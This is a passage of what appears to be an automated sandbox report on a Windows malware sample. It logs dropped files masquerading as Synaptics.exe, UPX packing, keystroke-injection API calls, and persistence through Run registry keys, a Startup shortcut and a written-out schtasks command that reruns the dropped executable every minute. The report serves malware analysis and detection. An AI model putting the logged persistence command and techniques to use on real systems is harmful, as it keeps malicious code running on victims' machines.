Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Section loaded: propsys.dll

Source: C:\Users\user\Desktop\VKKDXE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: CXNFQD.lnk.3.dr

LNK file: ..\..\..\..\..\Windata\ZTCKPI.exe

Source: C:\ProgramData\Synaptics\Synaptics.exe

File written: C:\Users\user\AppData\Local\Temp\KIGp1oT.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: VKKDXE.exe

Static file information: File size 1687552 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00EA20B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

3_2_00EA20B0

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DD05A8 push ss; ret	3_2_00DD05A9
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D67795 push ecx; ret	3_2_00D677A8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 6_2_15CBF1E7 push F3D87781h; retf	6_2_15CBF1F2
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 6_2_15CBF207 pushfd ; retf	6_2_15CBF20D
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E505A8 push ss; ret	15_2_00E505A9
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE7795 push ecx; ret	15_2_00DE77A8

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1

Jump to dropped file

Source: C:\Users\user\Desktop\VKKDXE.exe	File created: C:\ProgramData\Synaptics\RCX458E.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\VKKDXE.exe	File created: C:\Users\user\Desktop\._cache_VKKDXE.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1	Jump to dropped file
Source: C:\Users\user\Desktop\VKKDXE.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	File created: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Jump to dropped file

Source: C:\Users\user\Desktop\VKKDXE.exe	File created: C:\ProgramData\Synaptics\RCX458E.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\VKKDXE.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CXNFQD.lnk

Jump to behavior

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CXNFQD.lnk

Jump to behavior

Source: C:\Users\user\Desktop\VKKDXE.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CXNFQD	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CXNFQD	Jump to behavior

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	3_2_00D5F78E
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DA7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	3_2_00DA7F0E
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	15_2_00DDF78E
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E27F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	15_2_00E27F0E

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D61E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00D61E5A

Source: C:\ProgramData\Synaptics\Synaptics.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\VKKDXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
